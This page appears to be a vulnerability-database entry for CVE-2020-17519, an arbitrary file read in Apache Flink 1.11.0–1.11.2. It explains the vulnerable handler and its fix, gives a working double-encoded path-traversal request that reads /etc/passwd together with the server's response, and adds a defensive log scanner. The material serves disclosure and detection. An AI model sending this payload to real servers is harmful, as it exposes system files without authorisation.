Related vulnerability
Title:
Apache Flink security vulnerability
(CVE-2020-17519)
Description: Apache Flink is an open-source distributed stream-processing engine from the Apache Software Foundation (USA), written mainly in Java and Scala. Apache Flink versions 1.11.0 through 1.11.2 contain a security vulnerability that allows an attacker to read any file on the JobManager's local filesystem through the REST interface of the JobManager process.
Description
[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read
Introduction
<b>[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Apache Flink is a framework and distributed processing engine for stateful computations over unbounded and bounded data streams, developed in Java and Scala. A change introduced in Apache Flink 1.11.0 (and shipped in `1.11.1` and `1.11.2` as well) allows attackers to read any file on the local filesystem of the JobManager through the RESTful API of the JobManager process. Filesystem access is limited to files readable by the JobManager process.
All versions from `1.11.0` through `1.11.2` are affected; Apache Flink fixed the vulnerability in `1.11.3` and later.
The vulnerable code is in the `src/main/java/org/apache/flink/runtime/rest/handler/cluster/JobManagerCustomLogHandler.java` class. The relevant snippet is shown below.
```java
// JobManagerCustomLogHandler, Flink 1.11.0 - 1.11.2: the log file to serve is
// built directly from the URL path parameter supplied by the client.
if (logDir == null) {
    return null;
}
// Vulnerable line: the raw path parameter is used as-is, so a value containing
// "../" segments resolves to a file outside logDir.
String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);
return new File(logDir, filename);
}
}
```
The problem is that the request handler passes the client-supplied path parameter straight into the file path, so directory traversal sequences are honored. With this [commit](https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801?branch=b561010b0ee741543c3953306037f00d7a9f0801&diff=split), the vulnerable line was changed as shown below; in the snippet, the original vulnerable line is kept as a comment.
```java
if (logDir == null) {
    return null;
}
// Vulnerable line, removed by the fix:
// String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);
// Fixed: File.getName() keeps only the last path segment, so any directory
// components (including "../") in the parameter are discarded before the join.
String filename = new File(handlerRequest.getPathParameter(LogFileNamePathParameter.class)).getName();
return new File(logDir, filename);
}
}
```
<b>Proof of Concept (PoC):</b> In order to exploit this vulnerability, you can use the following request
```
GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1
Host: vulnerablehost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
```
The response to the above request is shown below.
```
HTTP/1.1 200 OK
Content-Type: text/plain
content-length: 964
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
flink:x:9999:9999::/opt/flink:/bin/sh
```
There is also a Metasploit module for CVE-2020-17519 with an Excellent ranking; its Ruby source can be found [here](https://www.exploit-db.com/exploits/49398).
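As an added defender-side example (not part of the original PoC or the Flink project), the following Python scans REST access-log lines for requests to the `/jobmanager/logs/` endpoint whose file name, once fully percent-decoded, is not a plain basename. It handles the double-encoded `..%252f` form used in the request above as well as single-encoded `..%2f`; the log format and all log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real logs). Line 3 carries the
# double-encoded traversal from the CVE-2020-17519 PoC, line 4 a single-encoded
# variant; the remaining lines are legitimate log-file requests.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jan/2021:10:00:01 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 5120
10.0.0.5 - - [02/Jan/2021:10:00:02 +0000] "GET /overview HTTP/1.1" 200 418
10.0.0.9 - - [02/Jan/2021:10:00:03 +0000] "GET /jobmanager/logs/..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 964
10.0.0.9 - - [02/Jan/2021:10:00:04 +0000] "GET /jobmanager/logs/..%2f..%2fetc%2fpasswd HTTP/1.1" 200 964
10.0.0.5 - - [02/Jan/2021:10:00:05 +0000] "GET /jobmanager/logs/flink-jobmanager.out HTTP/1.1" 200 12
"""

# Assumed combined-style log layout: client, ident, user, [time], "METHOD PATH PROTO", status
LOG_LINE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
LOG_PREFIX = "/jobmanager/logs/"


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing (bounded), so that both
    ..%252f (double-encoded) and ..%2f (single-encoded) end up as ../"""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def is_traversal(requested_name: str) -> bool:
    """True when the decoded log-file name could leave the log directory: it
    contains a path separator or a '..' segment. A legitimate name is a bare file name."""
    decoded = fully_decode(requested_name).replace("\\", "/")
    return "/" in decoded or ".." in decoded.split("/")


def find_log_traversal(log_text: str) -> list:
    """Return (source, raw path, decoded name, status) for each request to the
    custom-log endpoint whose file name is not a plain basename."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or not m.group("path").startswith(LOG_PREFIX):
            continue
        name = m.group("path")[len(LOG_PREFIX):]
        if is_traversal(name):
            hits.append((m.group("src"), m.group("path"), fully_decode(name), int(m.group("status"))))
    return hits
```

A `200` status on a flagged request indicates the server actually served the file, which is the signal worth alerting on for unpatched 1.11.x clusters.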

File snapshot
[4.0K] /data/pocs/faac86a3b8355c5aa057627e4649072066ecae49
├── [292K] poc2.png
├── [284K] poc.png
└── [3.6K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.